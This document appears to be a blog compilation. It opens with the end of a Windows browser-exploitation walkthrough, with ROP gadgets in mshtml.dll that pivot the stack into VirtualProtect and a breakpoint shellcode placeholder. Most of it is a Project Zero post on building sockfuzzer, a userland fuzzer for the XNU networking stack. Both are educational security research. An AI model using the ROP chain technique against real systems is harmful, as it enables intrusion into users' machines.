rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\uCCCC\uCCCC";
}

After ECX is incremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which then is exchanged with ESP to load the function call into ESP! The, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long winded blog post. It has been a bit disheartening to see a lack of beginning to end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping those out who want to get into it, but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Designing sockfuzzer, a network syscall fuzzer for XNU

By: Ryan
22 April 2021 at 18:05

Posted by Ned Williamson, Project Zero

Introduction

When I started my 20% project – an initiative where employees are allocated twenty-percent of their paid work time to pursue personal projects –  with Project Zero, I wanted to see if I could apply the techniques I had learned fuzzing Chrome to XNU, the kernel used in iOS and macOS. My interest was sparked after learning some prominent members of the iOS research community believed the kernel was “fuzzed to death,” and my understanding was that most of the top researchers used auditing for vulnerability research. This meant finding new bugs with fuzzing would be meaningful in demonstrating the value of implementing newer fuzzing techniques. In this project, I pursued a somewhat unusual approach to fuzz XNU networking in userland by converting it into a library, “booting” it in userspace and using my standard fuzzing workflow to discover vulnerabilities. Somewhat surprisingly, this worked well enough to reproduce some of my peers’ recent discoveries and report some of my own, one of which was a reliable privilege escalation from the app context, CVE-2019-8605, dubbed “SockPuppet.” I’m excited to open source this fuzzing project, “sockfuzzer,” for the community to learn from and adapt. In this post, we’ll do a deep dive into its design and implementation.

Attack Surface Review and Target Planning

Choosing Networking

We’re at the beginning of a multistage project. I had enormous respect for the difficulty of the task ahead of me. I knew I would need to be careful investing time at each stage of the process, constantly looking for evidence that I needed to change direction. The first big decision was to decide what exactly we wanted to target.

I started by downloading the XNU sources and reviewing them, looking for areas that handled a lot of attacker-controlled input and seemed amenable to fuzzing – immediately the networking subsystem jumped out as worthy of research. I had just exploited a Chrome sandbox bug that leveraged collaboration between an exploited renderer process and a server working in concert. I recognized these attack surfaces’ power, where some security-critical code is “sandwiched” between two attacker-controlled entities. The Chrome browser process is prone to use after free vulnerabilities due to the difficulty of managing state for large APIs, and I suspected XNU would have the same issue. Networking features both parsing and state management. I figured that even if others had already fuzzed the parsers extensively, there could still be use after free vulnerabilities lying dormant.

I then proceeded to look at recent bug reports. Two bugs that caught my eye: the mptcp overflow discovered by Ian Beer and the ICMP out of bounds write found by Kevin Backhouse. Both of these are somewhat “straightforward” buffer overflows. The bugs’ simplicity hinted that kernel networking, even packet parsing, was sufficiently undertested. A fuzzer combining network syscalls and arbitrary remote packets should be large enough in scope to reproduce these issues and find new ones.

Digging deeper, I wanted to understand how to reach these bugs in practice. By cross-referencing the functions and setting kernel breakpoints in a VM, I managed to get a more concrete idea. Here’s the call stack for Ian’s MPTCP bug:

The buggy function in question is mptcp_usr_connectx. Moving up the call stack, we find the connectx syscall, which we see in Ian’s original testcase. If we were to write a fuzzer to find this bug, how would we do it? Ultimately, whatever we do has to both find the bug and give us the information we need to reproduce it on the real kernel. Calling mptcp_usr_connectx directly should surely find the bug, but this seems like the wrong idea because it takes a lot of arguments. Modeling a fuzzer well enough to call this function directly in a way representative of the real code is no easier than auditing the code in the first place, so we’ve not made things any easier by writing a targeted fuzzer. It’s also wasted effort to write a target for each function this small. On the other hand, the further up the call stack we go, the more complexity we may have to support and the less chance we have of landing on the bug. If I were trying to unit test the networking stack, I would probably avoid the syscall layer and call the intermediate helper functions as a middle ground. This is exactly what I tried in the first draft of the fuzzer; I used sock_socket to create struct socket* objects to pass to connectitx in the hopes that it would be easy to reproduce this bug while being high-enough level that this bug could plausibly have been discovered without knowing where to look for it. Surprisingly, after some experimentation, it turned out to be easier to simply call the syscalls directly (via connectx). This makes it easier to translate crashing inputs into programs to run against a real kernel since testcases map 1:1 to syscalls. We’ll see more details about this later.

We can’t test networking properly without accounting for packets. In this case, data comes from the hardware, not via syscalls from a user process. We’ll have to expose this functionality to our fuzzer. To figure out how to extend our framework to support random packet delivery, we can use our next example bug. Let’s take a look at the call stack for delivering a packet to trigger the ICMP bug reported by Kevin Backhouse:

To reach the buggy function, icmp_error, the call stack is deeper, and unlike with syscalls, it’s not immediately obvious which of these functions we should call to cover the relevant code. Starting from the very top of the call stack, we see that the crash occurred in a kernel thread running the dlil_input_thread_func function. DLIL stands for Data Link Interface Layer, a reference to the OSI model’s data link layer. Moving further down the stack, we see ether_inet_input, indicating an Ethernet packet (since I tested this issue using Ethernet). We finally make it down to the IP layer, where ip_dooptions signals an icmp_error. As an attacker, we probably don’t have a lot of control over the interface a user uses to receive our input, so we can rule out some of the uppermost layers. We also don’t want to deal with threads in our fuzzer, another design tradeoff we’ll describe in more detail later. proto_input and ip_proto_input don’t do much, so I decided that ip_proto was where I would inject packets, simply by calling the function when I wanted to deliver a packet. After reviewing proto_register_input, I discovered another function called ip6_input, which was the entry point for the IPv6 code. Here’s the prototype for ip_input:

void ip_input(struct mbuf *m);


Mbufs are message buffers, a standard buffer format used in network stacks. They enable multiple small packets to be chained together through a linked list. So we just need to generate mbufs with random data before calling
ip_input.

I was surprised by how easy it was to work with the network stack compared to the syscall interface. `ip_input` and `ip6_input` pure functions that don’t require us to know any state to call them. But stepping back, it made more sense. Packet delivery is inherently a clean interface: our kernel has no idea what arbitrary packets may be coming in, so the interface takes a raw packet and then further down in the stack decides how to handle it. Many packets contain metadata that affect the kernel state once received. For example, TCP or UDP packets will be matched to an existing connection by their port number.

Most modern coverage guided fuzzers, including this LibFuzzer-based project, use a design inspired by AFL. When a test case with some known coverage is mutated and the mutant produces coverage that hasn’t been seen before, the mutant is added to the current corpus of inputs. It becomes available for further mutations to produce even deeper coverage. Lcamtuf, the author of AFL, has an excellent demonstration of how this algorithm created JPEGs using coverage feedback with no well-formed starting samples. In essence, most poorly-formed inputs are rejected early. When a mutated input passes a validation check, the input is saved. Then that input can be mutated until it manages to pass the second validation check, and so on. This hill climbing algorithm has no problem generating dependent sequences of API calls, in this case to interleave syscalls with ip_input and ip6_input. Random syscalls can get the kernel into some state where it’s expecting a packet. Later, when libFuzzer guesses a packet that gets the kernel into some new state, the hill climbing algorithm will record a new test case when it sees new coverage. Dependent sequences of syscalls and packets are brute-forced in a linear fashion, one call at a time.

Designing for (Development) Speed

Now that we know where to attack this code base, it’s a matter of building out the fuzzing research platform. I like thinking of it this way because it emphasizes that this fuzzer is a powerful assistant to a researcher, but it can’t do all the work. Like any other test framework, it empowers the researcher to make hypotheses and run experiments over code that looks buggy. For the platform to be helpful, it needs to be comfortable and fun to work with and get out of the way.

When it comes to standard practice for kernel fuzzing, there’s a pretty simple spectrum for strategies. On one end, you fuzz self-contained functions that are security-critical, e.g., OSUnserializeBinary. These are easy to write and manage and are generally quite performant. On the other end, you have “end to end” kernel testing that performs random syscalls against a real kernel instance. These heavyweight fuzzers have the advantage of producing issues that you know are actionable right away, but setup and iterative development are slower. I wanted to try a hybrid approach that could preserve some of the benefits of each style. To do so, I would port the networking stack of XNU out of the kernel and into userland while preserving as much of the original code as possible. Kernel code can be surprisingly portable and amenable to unit testing, even when run outside its natural environment.

There has been a push to add more user-mode unit testing to Linux. If you look at the documentation for Linux’s KUnit project, there’s an excellent quote from Linus Torvalds: “… a lot of people seem to think that performance is about doing the same thing, just doing it faster, and that is not true. That is not what performance is all about. If you can do something really fast, really well, people will start using it differently.” This statement echoes the experience I had writing targeted fuzzers for code in Chrome’s browser process. Due to extensive unit testing, Chrome code is already well-factored for fuzzing. In a day’s work, I could try out many iterations of a fuzz target and the edit/build/run cycle. I didn’t have a similar mechanism out of the box with XNU. In order to perform a unit test, I would need to rebuild the kernel. And despite XNU being considerably smaller than Chrome, incremental builds were slower due to the older kmk build system. I wanted to try bridging this gap for XNU.

Setting up the Scaffolding

“Unit” testing a kernel up through the syscall layer sounds like a big task, but it’s easier than you’d expect if you forgo some complexity. We’ll start by building all of the individual kernel object files from source using the original build flags. But instead of linking everything together to produce the final kernel binary, we link in only the subset of objects containing code in our target attack surface. We then stub or fake the rest of the functionality. Thanks to the recon in the previous section, we already know which functions we want to call from our fuzzer. I used that information to prepare a minimal list of source objects to include in our userland port.

Before we dive in, let’s define the overall structure of the project as pictured below. There’s going to be a fuzz target implemented in C++ that translates fuzzed inputs into interactions with the userland XNU library. The target code, libxnu, exposes a few wrapper symbols for syscalls and ip_input as mentioned in the attack surface review section. The fuzz target also exposes its random sequence of bytes to kernel APIs such as copyin or copyout, whose implementations have been replaced with fakes that use fuzzed input data.

To make development more manageable, I decided to create a new build system using CMake, as it supported Ninja for fast rebuilds. One drawback here is the original build system has to be run every time upstream is updated to deal with generated sources, but this is worth it to get a faster development loop. I captured all of the compiler invocations during a normal kernel build and used those to reconstruct the flags passed to build the various kernel subsystems. Here’s what that first pass looks like:

project(libxnu)

set(XNU_DEFINES

    -DAPPLE

    -DKERNEL

    # ...

)

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    bsd/net/if.c

    bsd/netinet/ip_input.c

    # ...

)

add_library(xnu SHARED ${XNU_SOURCES} ${FUZZER_FILES} ${XNU_HEADERS})

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer PRIVATE ${FUZZER_CXX_FLAGS})


Of course, without the rest of the kernel, we see tons of missing symbols.

  "_zdestroy", referenced from:

      _if_clone_detach in libxnu.a(if.c.o)

  "_zfree", referenced from:

      _kqueue_destroy in libxnu.a(kern_event.c.o)

      _knote_free in libxnu.a(kern_event.c.o)

      _kqworkloop_get_or_create in libxnu.a(kern_event.c.o)

      _kev_delete in libxnu.a(kern_event.c.o)

      _pipepair_alloc in libxnu.a(sys_pipe.c.o)

      _pipepair_destroy_pipe in libxnu.a(sys_pipe.c.o)

      _so_cache_timer in libxnu.a(uipc_socket.c.o)

      ...

  "_zinit", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _pipeinit in libxnu.a(sys_pipe.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _unp_init in libxnu.a(uipc_usrreq.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      ...

  "_zone_change", referenced from:

      _knote_init in libxnu.a(kern_event.c.o)

      _kern_event_init in libxnu.a(kern_event.c.o)

      _socketinit in libxnu.a(uipc_socket.c.o)

      _cfil_init in libxnu.a(content_filter.c.o)

      _tcp_init in libxnu.a(tcp_subr.c.o)

      _ifa_init in libxnu.a(if.c.o)

      _if_clone_attach in libxnu.a(if.c.o)

      ...

ld: symbol(s) not found for architecture x86_64

clang: error: linker command failed with exit code 1 (use -v to see invocation)

ninja: build stopped: subcommand failed.


To get our initial targeted fuzzer working, we can do a simple trick by linking against a file containing stubbed implementations of all of these. We take advantage of C’s weak type system here. For each function we need to implement, we can link an implementation
void func() { assert(false); }. The arguments passed to the function are simply ignored, and a crash will occur whenever the target code attempts to call it. This goal can be achieved with linker flags, but it was a simple enough solution that allowed me to get nice backtraces when I hit an unimplemented function.

// Unimplemented stub functions

// These should be replaced with real or mock impls.

#include <kern/assert.h>

#include <stdbool.h>

int printf(const char* format, ...);

void Assert(const char* file, int line, const char* expression) {

  printf("%s: assert failed on line %d: %s\n", file, line, expression);

  __builtin_trap();

}

void IOBSDGetPlatformUUID() { assert(false); }

void IOMapperInsertPage() { assert(false); }

// ...


Then we just link this file into the XNU library we’re building by adding it to the source list:

set(XNU_SOURCES

    bsd/conf/param.c

    bsd/kern/kern_asl.c

    # ...

    fuzz/syscall_wrappers.c

    fuzz/ioctl.c

    fuzz/backend.c

    fuzz/stubs.c

    fuzz/fake_impls.c


As you can see, there are some other files I included in the XNU library that represent faked implementations and helper code to expose some internal kernel APIs. To make sure our fuzz target will call code in the linked library, and not some other host functions (syscalls) with a clashing name, we hide all of the symbols in
libxnu by default and then expose a set of wrappers that call those functions on our behalf. I hide all the names by default using a CMake setting set_target_properties(xnu PROPERTIES C_VISIBILITY_PRESET hidden). Then we can link in a file (fuzz/syscall_wrappers.c) containing wrappers like the following:

__attribute__((visibility("default"))) int accept_wrapper(int s, caddr_t name,

                                                          socklen_t* anamelen,

                                                          int* retval) {

  struct accept_args uap = {

      .s = s,

      .name = name,

      .anamelen = anamelen,

  };

  return accept(kernproc, &uap, retval);

}

Note the visibility attribute that explicitly exports the symbol from the library. Due to the simplicity of these wrappers I created a script to automate this called generate_fuzzer.py using syscalls.master.

With the stubs in place, we can start writing a fuzz target now and come back to deal with implementing them later. We will see a crash every time the target code attempts to use one of the functions we initially left out. Then we get to decide to either include the real implementation (and perhaps recursively require even more stubbed function implementations) or to fake the functionality.

A bonus of getting a build working with CMake was to create multiple targets with different instrumentation. Doing so allows me to generate coverage reports using clang-coverage:

target_compile_options(xnu-cov PRIVATE ${XNU_C_FLAGS} -DLIBXNU_BUILD=1 -D_FORTIFY_SOURCE=0 -fprofile-instr-generate -fcoverage-mapping)


With that, we just add a fuzz target file and a protobuf file to use with protobuf-mutator and we’re ready to get started:

protobuf_generate_cpp(NET_PROTO_SRCS NET_PROTO_HDRS fuzz/net_fuzzer.proto)

add_executable(net_fuzzer fuzz/net_fuzzer.cc ${NET_PROTO_SRCS} ${NET_PROTO_HDRS})

target_include_directories(net_fuzzer PRIVATE libprotobuf-mutator)

target_compile_options(net_fuzzer

                       PRIVATE -g

                               -std=c++11

                               -Werror

                               -Wno-address-of-packed-member

                               ${FUZZER_CXX_FLAGS})

if(APPLE)

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES})

else()

target_link_libraries(net_fuzzer ${FUZZER_LD_FLAGS} xnu fuzzer protobuf-mutator ${Protobuf_LIBRARIES} pthread)

endif(APPLE)

Writing a Fuzz Target

At this point, we’ve assembled a chunk of XNU into a convenient library, but we still need to interact with it by writing a fuzz target. At first, I thought I might write many targets for different features, but I decided to write one monolithic target for this project. I’m sure fine-grained targets could do a better job for functionality that’s harder to fuzz, e.g., the TCP state machine, but we will stick to one for simplicity.

We’ll start by specifying an input grammar using protobuf, part of which is depicted below. This grammar is completely arbitrary and will be used by a corresponding C++ harness that we will write next. LibFuzzer has a plugin called libprotobuf-mutator that knows how to mutate protobuf messages. This will enable us to do grammar-based mutational fuzzing efficiently, while still leveraging coverage guided feedback. This is a very powerful combination.

message Socket {

  required Domain domain = 1;

  required SoType so_type = 2;

  required Protocol protocol = 3;

  // TODO: options, e.g. SO_ACCEPTCONN

}

message Close {

  required FileDescriptor fd = 1;

}

message SetSocketOpt {

  optional Protocol level = 1;

  optional SocketOptName name = 2;

  // TODO(nedwill): structure for val

  optional bytes val = 3;

  optional FileDescriptor fd = 4;

}

message Command {

  oneof command {

    Packet ip_input = 1;

    SetSocketOpt set_sock_opt = 2;

    Socket socket = 3;

    Close close = 4;

  }

}

message Session {

  repeated Command commands = 1;

  required bytes data_provider = 2;

}

I left some TODO comments intact so you can see how the grammar can always be improved. As I’ve done in similar fuzzing projects, I have a top-level message called Session that encapsulates a single fuzzer iteration or test case. This session contains a sequence of “commands” and a sequence of bytes that can be used when random, unstructured data is needed (e.g., when doing a copyin). Commands are syscalls or random packets, which in turn are their own messages that have associated data. For example, we might have a session that has a single Command message containing a “Socket” message. That Socket message has data associated with each argument to the syscall. In our C++-based target, it’s our job to translate messages of this custom specification into real syscalls and related API calls. We inform libprotobuf-mutator that our fuzz target expects to receive one “Session” message at a time via the macro DEFINE_BINARY_PROTO_FUZZER.

DEFINE_BINARY_PROTO_FUZZER(const Session &session) {

// ...

  std::set<int> open_fds;

  for (const Command &command : session.commands()) {

    int retval = 0;

    switch (command.command_case()) {

      case Command::kSocket: {

        int fd = 0;

        int err = socket_wrapper(command.socket().domain(),

                                 command.socket().so_type(),

                                 command.socket().protocol(), &fd);

        if (err == 0) {

          // Make sure we're tracking fds properly.

          if (open_fds.find(fd) != open_fds.end()) {

            printf("Found existing fd %d\n", fd);

            assert(false);

          }

          open_fds.insert(fd);

        }

        break;

      }

      case Command::kClose: {

        open_fds.erase(command.close().fd());

        close_wrapper(command.close().fd(), nullptr);

        break;

      }

      case Command::kSetSockOpt: {

        int s = command.set_sock_opt().fd();

        int level = command.set_sock_opt().level();

        int name = command.set_sock_opt().name();

        size_t size = command.set_sock_opt().val().size();

        std::unique_ptr<char[]> val(new char[size]);

        memcpy(val.get(), command.set_sock_opt().val().data(), size);

        setsockopt_wrapper(s, level, name, val.get(), size, nullptr);

        break;

      }

While syscalls are typically a straightforward translation of the protobuf message, other commands are more complex. In order to improve the structure of randomly generated packets, I added custom message types that I then converted into the relevant on-the-wire structure before passing it into ip_input. Here’s how this looks for TCP:

message Packet {

  oneof packet {

    TcpPacket tcp_packet = 1;

  }

}

message TcpPacket {

  required IpHdr ip_hdr = 1;

  required TcpHdr tcp_hdr = 2;

  optional bytes data = 3;

}

message IpHdr {

  required uint32 ip_hl = 1;

  required IpVersion ip_v = 2;

  required uint32 ip_tos = 3;

  required uint32 ip_len = 4;

  required uint32 ip_id = 5;

  required uint32 ip_off = 6;

  required uint32 ip_ttl = 7;

  required Protocol ip_p = 8;

  required InAddr ip_src = 9;

  required InAddr ip_dst = 10;

}

message TcpHdr {

  required Port th_sport = 1;

  required Port th_dport = 2;

  required TcpSeq th_seq = 3;

  required TcpSeq th_ack = 4;

  required uint32 th_off = 5;

  repeated TcpFlag th_flags = 6;

  required uint32 th_win = 7;

  required uint32 th_sum = 8;

  required uint32 th_urp = 9;

  // Ned's extensions

  required bool is_pure_syn = 10;

  required bool is_pure_ack = 11;

}

Unfortunately, protobuf doesn’t support a uint8 type, so I had to use uint32 for some fields. That’s some lost fuzzing performance. You can also see some synthetic TCP header flags I added to make certain flag combinations more likely: is_pure_syn and is_pure_ack. Now I have to write some code to stitch together a valid packet from these nested fields. Shown below is the code to handle just the TCP header.

std::string get_tcp_hdr(const TcpHdr &hdr) {

  struct tcphdr tcphdr = {

      .th_sport = (unsigned short)hdr.th_sport(),

      .th_dport = (unsigned short)hdr.th_dport(),

      .th_seq = __builtin_bswap32(hdr.th_seq()),

      .th_ack = __builtin_bswap32(hdr.th_ack()),

      .th_off = hdr.th_off(),

      .th_flags = 0,

      .th_win = (unsigned short)hdr.th_win(),

      .th_sum = 0, // TODO(nedwill): calculate the checksum instead of skipping it

      .th_urp = (unsigned short)hdr.th_urp(),

  };

  for (const int flag : hdr.th_flags()) {

    tcphdr.th_flags ^= flag;

  }

  // Prefer pure syn

  if (hdr.is_pure_syn()) {

    tcphdr.th_flags &= ~(TH_RST | TH_ACK);

    tcphdr.th_flags |= TH_SYN;

  } else if (hdr.is_pure_ack()) {

    tcphdr.th_flags &= ~(TH_RST | TH_SYN);

    tcphdr.th_flags |= TH_ACK;

  }

  std::string dat((char *)&tcphdr, (char *)&tcphdr + sizeof(tcphdr));

  return dat;

}


As you can see, I make liberal use of a custom grammar to enable better quality fuzzing. These efforts are worth it, as randomizing high level structure is more efficient. It will also be easier for us to interpret crashing test cases later as they will have the same high level representation.

High-Level Emulation

Now that we have the code building and an initial fuzz target running, we begin the first pass at implementing all of the stubbed code that is reachable by our fuzz target. Because we have a fuzz target that builds and runs, we now get instant feedback about which functions our target hits. Some core functionality has to be supported before we can find any bugs, so the first attempt to run the fuzzer deserves its own development phase. For example, until dynamic memory allocation is supported, almost no kernel code we try to cover will work considering how heavily such code is used.

We’ll be implementing our stubbed functions with fake variants that attempt to have the same semantics. For example, when testing code that uses an external database library, you could replace the database with a simple in-memory implementation. If you don’t care about finding database bugs, this often makes fuzzing simpler and more robust. For some kernel subsystems unrelated to networking we can use entirely different or null implementations. This process is reminiscent of high-level emulation, an idea used in game console emulation. Rather than aiming to emulate hardware, you can try to preserve the semantics but use a custom implementation of the API. Because we only care about testing networking, this is how we approach faking subsystems in this project.

I always start by looking at the original function implementation. If it’s possible, I just link in that code as well. But some functionality isn’t compatible with our fuzzer and must be faked. For example, zalloc should call the userland malloc since virtual memory is already managed by our host kernel and we have allocator facilities available. Similarly, copyin and copyout need to be faked as they no longer serve to copy data between user and kernel pages. Sometimes we also just “nop” out functionality that we don’t care about. We’ll cover these decisions in more detail later in the “High-Level Emulation” phase. Note that by implementing these stubs lazily whenever our fuzz target hits them, we immediately reduce the work in handling all the unrelated functions by an order of magnitude. It’s easier to stay motivated when you only implement fakes for functions that are used by the target code. This approach successfully saved me a lot of time and I’ve used it on subsequent projects as well. At the time of writing, I have 398 stubbed functions, about 250 functions that are trivially faked (return 0 or void functions that do nothing), and about 25 functions that I faked myself (almost all related to porting the memory allocation systems to userland).

Booting Up

As soon as we start running the fuzzer, we’ll run into a snag: many resources require a one-time initialization that happens on boot. The BSD half of the kernel is mostly initialized by calling the bsd_init function. That function, in turn, calls several subsystem-specific initialization functions. Keeping with the theme of supporting a minimally necessary subset of the kernel, rather than call bsd_init, we create a new function that only initializes parts of the kernel as needed.

Here’s an example crash that occurs without the one time kernel bootup initialization:

    #7 0x7effbc464ad0 in zalloc /source/build3/../fuzz/zalloc.c:35:3

    #8 0x7effbb62eab4 in pipepair_alloc /source/build3/../bsd/kern/sys_pipe.c:634:24

    #9 0x7effbb62ded5 in pipe /source/build3/../bsd/kern/sys_pipe.c:425:10

    #10 0x7effbc4588ab in pipe_wrapper /source/build3/../fuzz/syscall_wrappers.c:216:10

    #11 0x4ee1a4 in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:979:19

Our zalloc implementation (covered in the next section) failed because the pipe zone wasn’t yet initialized:

static int

pipepair_alloc(struct pipe **rp_out, struct pipe **wp_out)

{

        struct pipepair *pp = zalloc(pipe_zone);

Scrolling up in sys_pipe.c, we see where that zone is initialized:

void

pipeinit(void)

{

        nbigpipe = 0;

        vm_size_t zone_size;

        zone_size = 8192 * sizeof(struct pipepair);

        pipe_zone = zinit(sizeof(struct pipepair), zone_size, 4096, "pipe zone");

Sure enough, this function is called by bsd_init. By adding that to our initial setup function the zone works as expected. After some development cycles spent supporting all the needed bsd_init function calls, we have the following:

__attribute__((visibility("default"))) bool initialize_network() {

  mcache_init();

  mbinit();

  eventhandler_init();

  pipeinit();

  dlil_init();

  socketinit();

  domaininit();

  loopattach();

  ether_family_init();

  tcp_cc_init();

  net_init_run();

  int res = necp_init();

  assert(!res);

  return true;

}


The original
bsd_init is 683 lines long, but our initialize_network clone is the preceding short snippet. I want to remark how cool I found it that you could “boot” a kernel like this and have everything work so long as you implemented all the relevant stubs. It just goes to show a surprising fact: a significant amount of kernel code is portable, and simple steps can be taken to make it testable. These codebases can be modernized without being fully rewritten. As this “boot” relies on dynamic allocation, let’s look at how I implemented that next.

Dynamic Memory Allocation

Providing a virtual memory abstraction is a fundamental goal of most kernels, but the good news is this is out of scope for this project (this is left as an exercise for the reader). Because networking already assumes working virtual memory, the network stack functions almost entirely on top of high-level allocator APIs. This makes the subsystem amenable to “high-level emulation”. We can create a thin shim layer that intercepts XNU specific allocator calls and translates them to the relevant host APIs.

In practice, we have to handle three types of allocations for this project: “classic” allocations (malloc/calloc/free), zone allocations (zalloc), and mbuf (memory buffers). The first two types are more fundamental allocation types used across XNU, while mbufs are a common data structure used in low-level networking code.

The zone allocator is reasonably complicated, but we use a simplified model for our purposes: we just track the size assigned to a zone when it is created and make sure we malloc that size when zalloc is later called using the initialized zone. This could undoubtedly be modeled better, but this initial model worked quite well for the types of bugs I was looking for. In practice, this simplification affects exploitability, but we aren’t worried about that for a fuzzing project as we can assess that manually once we discover an issue. As you can see below, I created a custom zone type that simply stored the configured size, knowing that my zinit would return an opaque pointer that would be passed to my zalloc implementation, which could then use calloc to service the request. zfree simply freed the requested bytes and ignored the zone, as allocation sizes are tracked by the host malloc already.

struct zone {

  uintptr_t size;

};

struct zone* zinit(uintptr_t size, uintptr_t max, uintptr_t alloc,

                   const char* name) {

  struct zone* zone = (struct zone*)calloc(1, sizeof(struct zone));

  zone->size = size;

  return zone;

}

void* zalloc(struct zone* zone) {

  assert(zone != NULL);

  return calloc(1, zone->size);

}

void zfree(void* zone, void* dat) {

  (void)zone;

  free(dat);

}

Kalloc, kfree, and related functions were passed through to malloc and free as well. You can see fuzz/zalloc.c for their implementations. Mbufs (memory buffers) are more work to implement because they contain considerable metadata that is exposed to the “client” networking code.

struct m_hdr {

        struct mbuf     *mh_next;       /* next buffer in chain */

        struct mbuf     *mh_nextpkt;    /* next chain in queue/record */

        caddr_t         mh_data;        /* location of data */

        int32_t         mh_len;         /* amount of data in this mbuf */

        u_int16_t       mh_type;        /* type of data in this mbuf */

        u_int16_t       mh_flags;       /* flags; see below */

};

/*

 * The mbuf object

 */

struct mbuf {

        struct m_hdr m_hdr;

        union {

                struct {

                        struct pkthdr MH_pkthdr;        /* M_PKTHDR set */

                        union {

                                struct m_ext MH_ext;    /* M_EXT set */

                                char    MH_databuf[_MHLEN];

                        } MH_dat;

                } MH;

                char    M_databuf[_MLEN];               /* !M_PKTHDR, !M_EXT */

        } M_dat;

};


I didn’t include the
pkthdr nor m_ext structure definitions, but they are nontrivial (you can see for yourself in bsd/sys/mbuf.h). A lot of trial and error was needed to create a simplified mbuf format that would work. In practice, I use an inline buffer when possible and, when necessary, locate the data in one large external buffer and set the M_EXT flag. As these allocations must be aligned, I use posix_memalign to create them, rather than malloc. Fortunately ASAN can help manage these allocations, so we can detect some bugs with this modification.

Two bugs I reported via the Project Zero tracker highlight the benefit of the heap-based mbuf implementation. In the first report, I detected an mbuf double free using ASAN. While the m_free implementation tries to detect double frees by checking the state of the allocation, ASAN goes even further by quarantining recently freed allocations to detect the bug. In this case, it looks like the fuzzer would have found the bug either way, but it was impressive. The second issue linked is much subtler and requires some instrumentation to detect the bug, as it is a use after free read of an mbuf:

==22568==ERROR: AddressSanitizer: heap-use-after-free on address 0x61500026afe5 at pc 0x7ff60f95cace bp 0x7ffd4d5617b0 sp 0x7ffd4d5617a8

READ of size 1 at 0x61500026afe5 thread T0

    #0 0x7ff60f95cacd in tcp_input bsd/netinet/tcp_input.c:5029:25

    #1 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #2 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10

0x61500026afe5 is located 229 bytes inside of 256-byte region [0x61500026af00,0x61500026b000)

freed by thread T0 here:

    #0 0x4a158d in free /b/swarming/w/ir/cache/builder/src/third_party/llvm/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3

    #1 0x7ff60fb7444d in m_free fuzz/zalloc.c:220:3

    #2 0x7ff60f4e3527 in m_freem bsd/kern/uipc_mbuf.c:4842:7

    #3 0x7ff60f5334c9 in sbappendstream_rcvdemux bsd/kern/uipc_socket2.c:1472:3

    #4 0x7ff60f95821d in tcp_input bsd/netinet/tcp_input.c:5019:8

    #5 0x7ff60f949321 in tcp6_input bsd/netinet/tcp_input.c:1062:2

    #6 0x7ff60fa9263c in ip6_input bsd/netinet6/ip6_input.c:1277:10


Apple managed to catch this issue before I reported it, fixing it in iOS 13. I believe Apple has added some internal hardening or testing for mbufs that caught this bug. It could be anything from a hardened mbuf allocator like
GWP-ASAN, to an internal ARM MTE test, to simple auditing, but it was really cool to see this issue detected in this way, and also that Apple was proactive enough to find this themselves.

Accessing User Memory

When talking about this project with a fellow attendee at a fuzzing conference, their biggest question was how I handled user memory access. Kernels are never supposed to trust pointers provided by user-space, so whenever the kernel wants to access memory-mapped in userspace, it goes through intermediate functions copyin and copyout. By replacing these functions with our fake implementations, we can supply fuzzer-provided input to the tested code. The real kernel would have done the relevant copies from user to kernel pages. Because these copies are driven by the target code and not our testcase, I added a buffer in the protobuf specification to be used to service these requests.

Here’s a backtrace from our stub before we implement `copyin`. As you can see, when calling the `recvfrom` syscall, our fuzzer passed in a pointer as an argument.

    #6 0x7fe1176952f3 in Assert /source/build3/../fuzz/stubs.c:21:3

    #7 0x7fe11769a110 in copyin /source/build3/../fuzz/fake_impls.c:408:3

    #8 0x7fe116951a18 in __copyin_chk /source/build3/../bsd/libkern/copyio.h:47:9

    #9 0x7fe116951a18 in recvfrom_nocancel /source/build3/../bsd/kern/uipc_syscalls.c:2056:11

    #10 0x7fe117691a86 in recvfrom_nocancel_wrapper /source/build3/../fuzz/syscall_wrappers.c:244:10

    #11 0x4e933a in TestOneProtoInput(Session const&) /source/build3/../fuzz/net_fuzzer.cc:936:9

    #12 0x4e43b8 in LLVMFuzzerTestOneInput /source/build3/../fuzz/net_fuzzer.cc:631:1

